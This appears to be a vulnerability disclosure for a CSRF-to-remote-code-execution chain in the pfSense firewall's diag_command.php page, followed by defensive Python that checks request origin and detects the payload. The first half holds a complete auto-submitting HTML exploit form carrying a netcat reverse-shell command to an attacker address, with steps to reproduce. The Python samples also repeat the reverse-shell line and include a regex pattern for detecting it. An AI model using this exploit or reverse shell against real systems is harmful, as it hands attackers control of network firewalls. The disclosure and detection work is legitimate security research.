github repo: https://github.com/pfsense/pfsense

The pfSense firewall is vulnerable to RCE chained with CSRF because it uses the `csrf magic` library, which allows the CSRF token values submitted with form requests to be tampered with. An attacker can exploit this flaw by crafting a page whose form contains attacker-controlled input, such as a reverse shell command (e.g. `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip port >/tmp/f`) together with the token value, and enticing the victim to click the crafted link via social engineering. Once the victim clicks the link (the "Try again" button in this case), the attacker gains control of the victim's machine and malicious actions can be performed on the victim's behalf.
<!DOCTYPE html>
<html>
<body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
<form id="myForm" action="http://pfsense/diag_command.php" method="POST">
<input type=hidden name="txtCommand" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4433 >/tmp/f">
<input type=hidden name="txtRecallBuffer" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4433 >/tmp/f">
<input type=hidden name="dlPath" value="">
<input type=hidden name="txtPHPCommand" value="">
<input type="hidden" name="submit" value="EXEC">
</form>
</body>
</html>
Steps to Reproduce :-
Create a malicious page containing the HTML shown above. When the user opens it, the form submits automatically and the user is redirected to the https://pfsense/diag_command.php page.
You will be greeted with the message shown below.

Once the Try again button is clicked, you will be greeted with a reverse shell from the victim.
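From the defender's side, the request shape the writeup describes (a cross-site POST to diag_command.php carrying a netcat reverse-shell pipeline) is straightforward to reject or flag. The following is an added example, not pfSense or csrf-magic code; it assumes requests are available as dicts with method, path, headers and form fields, and the sample requests are constructed, not captured traffic.

```python
"""Defensive checks for diag_command.php POSTs (added example, not pfSense code)."""
import re
from urllib.parse import urlsplit

SENSITIVE_PATHS = {"/diag_command.php"}
# Shape of the reverse shell from the writeup: a FIFO piped through a shell into nc.
REVERSE_SHELL_RE = re.compile(r"mkfifo\s+\S+.*\|\s*/bin/sh.*\|\s*nc\s+\S+\s+\d+", re.S)


def is_cross_site(headers: dict, expected_host: str) -> bool:
    """True when browser-supplied origin metadata does not match our own host.

    Sec-Fetch-Site is checked first (page script cannot set it); otherwise fall
    back to Origin, then Referer. A POST carrying none of them is treated as
    cross-site, since a same-origin browser form submission always sends Origin.
    """
    site = headers.get("Sec-Fetch-Site")
    if site is not None:
        return site != "same-origin"
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value:
            return urlsplit(value).hostname != expected_host
    return True


def classify_request(req: dict, expected_host: str) -> list:
    """Return findings for one request; an empty list means nothing suspicious."""
    findings = []
    if req["method"] != "POST" or req["path"] not in SENSITIVE_PATHS:
        return findings
    if is_cross_site(req["headers"], expected_host):
        findings.append("cross-site POST to command-execution page")
    for field in ("txtCommand", "txtRecallBuffer"):
        if REVERSE_SHELL_RE.search(req["form"].get(field, "")):
            findings.append(f"reverse-shell pipeline in {field}")
    return findings


# Constructed sample requests (not real traffic). The first mirrors the
# writeup's auto-submitting form; the second is a legitimate same-origin use.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/diag_command.php",
     "headers": {"Host": "pfsense", "Origin": "http://attacker.example", "Sec-Fetch-Site": "cross-site"},
     "form": {"txtCommand": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4433 >/tmp/f"}},
    {"method": "POST", "path": "/diag_command.php",
     "headers": {"Host": "pfsense", "Origin": "http://pfsense", "Sec-Fetch-Site": "same-origin"},
     "form": {"txtCommand": "ls -la /var/log"}},
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req["path"], classify_request(req, "pfsense") or "ok")
```

The origin check is the mitigation (a CSRF-driven submission from another site fails it regardless of token handling); the payload regex is only a detection heuristic for the specific pipeline shown in the writeup.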